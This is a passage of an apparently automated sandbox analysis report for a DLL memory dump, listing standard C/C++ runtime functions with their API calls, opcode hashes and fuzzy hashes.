                                                                                                                                    • Part of subcall function 6E931434: HeapFree.KERNEL32(00000000,00000000,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?), ref: 6E93144A
                                                                                                                                    • Part of subcall function 6E931434: GetLastError.KERNEL32(?,?,6E93D1C0,?,00000000,?,?,?,6E93D4C4,?,00000007,?,?,6E93B43B,?,?), ref: 6E93145C
                                                                                                                                  • _free.LIBCMT ref: 6E93CF0F
                                                                                                                                  • _free.LIBCMT ref: 6E93CF21
                                                                                                                                  • _free.LIBCMT ref: 6E93CF33
                                                                                                                                  • _free.LIBCMT ref: 6E93CF45
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                  • Opcode ID: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction ID: 6317e2dcd4c17c898ec34a8ae09e7dc21c832c8673b0bc5dcaf0d10dc1b83b76
                                                                                                                                  • Opcode Fuzzy Hash: 18da560f28fd09a14ca3f854e1c34fd2ec7704841c61a228db5dd80ea5b4ff81
                                                                                                                                  • Instruction Fuzzy Hash: CDF06D35509E34ABCA40DBDAE488DDB37EDAF42614BB84C05F018DB601CB30F8C48EA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8E6020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Smanip$task
                                                                                                                                  • String ID: .
                                                                                                                                  • API String ID: 1925983085-248832578
                                                                                                                                  • Opcode ID: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction ID: 11973df3d927521aebf228c1b77d65fb753f2ca8bfa0d7065b47be3915b1b248
                                                                                                                                  • Opcode Fuzzy Hash: a65e16cce39e5dae10fafb00ba16f26399d7800388a94bfdd3592628b3517f70
                                                                                                                                  • Instruction Fuzzy Hash: FF8139B1904628DFCF08CF98CA90EEA77B5FF57304F108959D206A7684D7B4AA4CDB54
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8FDF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8FDF6D
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F681A
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6837
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocstr.LIBCPMT ref: 6E8F6854
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6866
                                                                                                                                    • Part of subcall function 6E8F67FA: _Maklocchr.LIBCPMT ref: 6E8F6879
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FDFFA
                                                                                                                                  • _Mpunct.LIBCPMT ref: 6E8FE014
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                  • Opcode ID: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction ID: 6dcc549fe59e99c9fe3fc5f3eba8f0bf9d81947785cd0296121c9bca1ad7a167
                                                                                                                                  • Opcode Fuzzy Hash: d8f207b87671f4ab34ced7d3884fa331846cc4aed6e80496cf74008402f66db6
                                                                                                                                  • Instruction Fuzzy Hash: E02171B1904B56AFD721CFB98450B7BBAECAF18258B040E1EA459C7A41D774D602CFD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E906B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Mpunct$H_prolog3
                                                                                                                                  • String ID: $+xv
                                                                                                                                  • API String ID: 4281374311-1686923651
                                                                                                                                  • Opcode ID: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction ID: 3e96006575a0a05f8f3ff08aa6ed7046c1720db0e26f2fecf60b3499a05e8932
                                                                                                                                  • Opcode Fuzzy Hash: 96edfc0e45770f848c7d35f814d305d90dc15db41d8a1ded508af638e9c91fd9
                                                                                                                                  • Instruction Fuzzy Hash: 992183B1904B56AFD761CFB9845077BBEECAF18244F440A1EE499C7A41E734D642CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F02A0, Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1384045349-0
                                                                                                                                  • Opcode ID: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction ID: 0903cdbf6cd7a2f8dbe30e1ef9198d78cd119f97495db3acb285da0d538c4767
                                                                                                                                  • Opcode Fuzzy Hash: 156eb786f058ca98f5ef6e43c32f906b09548f9e4d04f55283ed5555e0261185
                                                                                                                                  • Instruction Fuzzy Hash: 5D4106B1C00258DFDB14CFE8C940BDDBBB8BF49308F108AA9E419AB281EB755A44CF50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E9308CB, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction ID: e7c625cf5c8ee33ed51a7d1beea6d955a464cdec547837539f31e2f1f58af872
                                                                                                                                  • Opcode Fuzzy Hash: fb61acb069c1d48d5be760e465db3665d6ef6aae32701e6d72f8366c667aa36d
                                                                                                                                  • Instruction Fuzzy Hash: C221D872E05631EFEB115AE98C44B5A776D9F47BA0F310521E955AB384F630ED008DD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92F299, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                  • _free.LIBCMT ref: 6E92F2FB
                                                                                                                                  • _free.LIBCMT ref: 6E92F331
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 50ca68d017433e6bc22732ad6e2a58461059f1c724fb957fc9a502b5449ceb6b
                                                                                                                                  • Instruction ID: 0968982f0bf7dd37af59804bce30cbcf7c72255aa00c76726e50d22b7ea15124
                                                                                                                                  • Opcode Fuzzy Hash: 50ca68d017433e6bc22732ad6e2a58461059f1c724fb957fc9a502b5449ceb6b
                                                                                                                                  • Instruction Fuzzy Hash: 44110A32229A226EEF411AF59C84D9F329D9FD36BDB350D34F534A61D8EF60C8098D50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E92F3F0, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F3F5
                                                                                                                                  • _free.LIBCMT ref: 6E92F452
                                                                                                                                  • _free.LIBCMT ref: 6E92F488
                                                                                                                                  • SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,?,?,6E918835,6E92F53A,?,?,6E8E565E,000008BB,6E97A0D4), ref: 6E92F493
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2283115069-0
                                                                                                                                  • Opcode ID: 38ce6358921405c726e1a71828b39076f6fb9bc65f22a472c548d8d76dfc966a
                                                                                                                                  • Instruction ID: e73197dc68c5435c7b8b7e2190227aaa0a0fd879a24129ba6b53b217c5048673
                                                                                                                                  • Opcode Fuzzy Hash: 38ce6358921405c726e1a71828b39076f6fb9bc65f22a472c548d8d76dfc966a
                                                                                                                                  • Instruction Fuzzy Hash: B411EC31628B116EEF611AF95C89D9B335DAFD267D7340934F534A63D8EFA0C8088920
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EF8E0, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF95F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF96B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF980
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF998
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction ID: bd4805fce96bbe2cfd29895ea3203faea78ddc504dfd8c8a12b470b951a0bd0d
                                                                                                                                  • Opcode Fuzzy Hash: 8242076e6a00f3fc3723176f8f108a9ecde104cf41b43a0bb57efa3f61300119
                                                                                                                                  • Instruction Fuzzy Hash: 48212AB1D0024CEFCB05CFD8C950BDDBBB9BF49318F108969E819AB694DB346A05CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8EF800, Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F039A
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03A6
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03B2
                                                                                                                                    • Part of subcall function 6E8F02A0: task.LIBCPMTD ref: 6E8F03C1
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF87F
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF88B
                                                                                                                                  • Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 6E8EF8A0
                                                                                                                                  • task.LIBCPMTD ref: 6E8EF8B8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2520070614-0
                                                                                                                                  • Opcode ID: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction ID: db557a30f8cc965092d4e6c18c08b6e3dd7fccf8fc736e3744d96081085fa78a
                                                                                                                                  • Opcode Fuzzy Hash: c2083d6a0ca5c5cf9a6f8fe57b0dff93d0c75cd797d0c2b20cdb12e674f5bba4
                                                                                                                                  • Instruction Fuzzy Hash: AA214AB1D0024CEFCB05CFD8C840BDEBBB9BF49318F008969E819AB694DB306A05CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E8F1E2F, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog3.LIBCMT ref: 6E8F1E36
                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 6E8F1E43
                                                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6E8F1E80
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FCD
                                                                                                                                    • Part of subcall function 6E8F0FAE: _Yarn.LIBCPMT ref: 6E8F0FF1
                                                                                                                                  • std::exception::exception.LIBCMTD ref: 6E8F1EA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Yarnstd::_$H_prolog3Locinfo::_Locinfo_ctorLockitLockit::_std::exception::exception
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2425033533-0
                                                                                                                                  • Opcode ID: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction ID: 84bc7622b8dd86b95011762930e5fef9f71cad178bb29a326bb75f629c6d9a3e
                                                                                                                                  • Opcode Fuzzy Hash: 58c68a8cb1911bc2331c71e0a53f10dd197e7aee479de4d9163249f95665cfd4
                                                                                                                                  • Instruction Fuzzy Hash: BD015BB1405B44DFC7208FAA848058AFAE4BF29254B908D6FE58987A01D730D545CB99
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E932439, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 355COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _free
                                                                                                                                  • String ID: -
                                                                                                                                  • API String ID: 269201875-2547889144
                                                                                                                                  • Opcode ID: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction ID: 39835b0edfa9c604f16208a467f4e7223842532e9d05214564326cd04fe60ae8
                                                                                                                                  • Opcode Fuzzy Hash: 6530cb2c14446d5867c15bb2c077cf7cc701484ca49d6d32cf54dd982df9c047
                                                                                                                                  • Instruction Fuzzy Hash: 57C1C2319042369ADB649FE4CC50BEA73BDFF65718F3045AAD80697284EB31DA81CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 6E927A9D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __startOneArgErrorHandling.LIBCMT ref: 6E927B2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.548478359.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorHandling__start
                                                                                                                                  • String ID: pow
                                                                                                                                  • API String ID: 3213639722-2276729525
                                                                                                                                  • Opcode ID: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction ID: bf31e69305876a649dd19c868a5efa82f2a87730dfe5c88523ab3639ef6db876
                                                                                                                                  • Opcode Fuzzy Hash: 649c906b493a2fc5f51125b8765dfe8488a923f44d8fb3a044b036afc0c7930b
                                                                                                                                  • Instruction Fuzzy Hash: AF517961A2C102DEDF81B6E4C9503AB7BACDF41750F304D79F8A1922DCEB32C4919E86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%